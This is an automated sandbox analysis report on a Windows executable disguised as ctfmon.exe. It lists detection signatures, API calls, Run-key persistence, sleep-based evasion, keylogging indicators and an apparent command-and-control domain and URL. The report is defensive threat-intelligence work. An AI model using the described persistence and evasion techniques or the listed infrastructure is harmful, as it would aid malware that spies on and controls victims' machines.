Edit tour

Windows Analysis Report
ctfmon.exe

Overview

General Information

Sample name:	ctfmon.exe
Analysis ID:	1581370
MD5:	e93fc4c159d07f6bfc246c10e6149ef8
SHA1:	5cd471e675ee61296a0aa0ce842835e710025b65
SHA256:	184b00a27e5b28089f7061ab3f92d2d4edafae37d33fb9f97af81d3b5cbdb559
Tags:	exeuser-windshock
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ctfmon.exe (PID: 2096 cmdline: "C:\Users\user\Desktop\ctfmon.exe" MD5: E93FC4C159D07F6BFC246C10E6149EF8)

ctfmon.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\ctfmon.exe" MD5: E93FC4C159D07F6BFC246C10E6149EF8)

cleanup

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\ctfmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ctfmon.exe, ProcessId: 2096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ctfmon.exe	Virustotal: Detection: 15%			Perma Link
Source: ctfmon.exe	ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: ctfmon.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,	0_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,	0_2_00405FAB
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,	3_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,	3_2_00405FAB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\ctfmon.exe

Code function: 0_2_004014B0 VirtualAlloc,VirtualAlloc,WSAStartup,LoadLibraryW,GetProcAddress,FreeLibrary,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateEventW,CreateEventW,SetEvent,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateEventW,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,InternetCloseHandle,InternetOpenA,Sleep,InternetConnectA,InternetCloseHandle,Sleep,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetSetOptionA,Sleep,WaitForSingleObject,ResetEvent,HttpAddRequestHeadersA,HttpSendRequestA,InternetReadFile,GetLastError,SetEvent,

0_2_004014B0

Source: global traffic

DNS traffic detected: DNS query: mircroupdata.dynamic-dns.net

Source: ctfmon.exe, 00000003.00000002.4563354300.0000000000605000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: http://mircroupdata.dynamic-dns.net/item.asp?spm=xx

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_004235E7 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	0_2_004235E7
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00420782 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00420782
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_004235E7 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	3_2_004235E7
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00420782 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	3_2_00420782

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00422975	0_2_00422975
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00417032	0_2_00417032
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041A100	0_2_0041A100
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041B310	0_2_0041B310
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00413595	0_2_00413595
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_004196B0	0_2_004196B0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041F7C0	0_2_0041F7C0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_004188E0	0_2_004188E0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041B890	0_2_0041B890
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00419C60	0_2_00419C60
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041BF10	0_2_0041BF10
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00401FF0	0_2_00401FF0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00417032	3_2_00417032
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041A100	3_2_0041A100
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041B310	3_2_0041B310
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00413595	3_2_00413595
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_004196B0	3_2_004196B0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041F7C0	3_2_0041F7C0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_004188E0	3_2_004188E0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041B890	3_2_0041B890
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00422975	3_2_00422975
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00419C60	3_2_00419C60
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041BF10	3_2_0041BF10
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00401FF0	3_2_00401FF0

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: String function: 00424CED appears 46 times
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: String function: 004283EE appears 38 times
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: String function: 0040D1F7 appears 50 times
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: String function: 0040DEC0 appears 254 times

Source: ctfmon.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal52.winEXE@2/0@16/1

Source: C:\Users\user\Desktop\ctfmon.exe

Code function: 0_2_00403A00 EnumProcesses,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,OpenProcess,EnumProcessModules,GetModuleFileNameExW,CloseHandle,Process32NextW,CloseHandle,

0_2_00403A00

Source: C:\Users\user\Desktop\ctfmon.exe

Code function: 0_2_0042131A __EH_prolog,FindResourceW,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,

0_2_0042131A

Source: ctfmon.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ctfmon.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ctfmon.exe	Virustotal: Detection: 15%
Source: ctfmon.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\ctfmon.exe

File read: C:\Users\user\Desktop\ctfmon.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ctfmon.exe "C:\Users\user\Desktop\ctfmon.exe"
Source: unknown	Process created: C:\Users\user\Desktop\ctfmon.exe "C:\Users\user\Desktop\ctfmon.exe"

Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK
Source: C:\Users\user\Desktop\ctfmon.exe	Automated click: OK

Source: C:\Users\user\Desktop\ctfmon.exe

0_2_004014B0

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0040DBE0 push eax; ret	0_2_0040DC0E
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0040DEC0 push eax; ret	0_2_0040DEDE
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0040DBE0 push eax; ret	3_2_0040DC0E
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0040DEC0 push eax; ret	3_2_0040DEDE

Source: C:\Users\user\Desktop\ctfmon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon.exe	Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_004013E0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	0_2_004013E0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041D720 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	0_2_0041D720
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00405B9B MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00405B9B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0041CF70 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	0_2_0041CF70
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_004013E0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_004013E0
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041D720 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	3_2_0041D720
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00405B9B MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,	3_2_00405B9B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0041CF70 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	3_2_0041CF70

Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,CreateEventW,		0_2_00403550
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,CreateEventW,		3_2_00403550

Source: C:\Users\user\Desktop\ctfmon.exe	Window / User API: threadDelayed 1991			Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Window / User API: threadDelayed 7789			Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-19574

Source: C:\Users\user\Desktop\ctfmon.exe	API coverage: 9.7 %
Source: C:\Users\user\Desktop\ctfmon.exe	API coverage: 8.9 %

Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052	Thread sleep time: -7080000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 3052	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 2820	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960	Thread sleep count: 1991 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960	Thread sleep time: -238920000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960	Thread sleep count: 7789 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe TID: 5960	Thread sleep time: -934680000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ctfmon.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\ctfmon.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,	0_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 0_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,	0_2_00405FAB
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_0042585B __EH_prolog,GetFullPathNameW,lstrcpynW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrcpyW,	3_2_0042585B
Source: C:\Users\user\Desktop\ctfmon.exe	Code function: 3_2_00405FAB SetCurrentDirectoryW,lstrcpyW,FindFirstFileW,GetLastError,SetLastError,	3_2_00405FAB

Source: C:\Users\user\Desktop\ctfmon.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\ctfmon.exe	Thread delayed: delay time: 120000	Jump to behavior

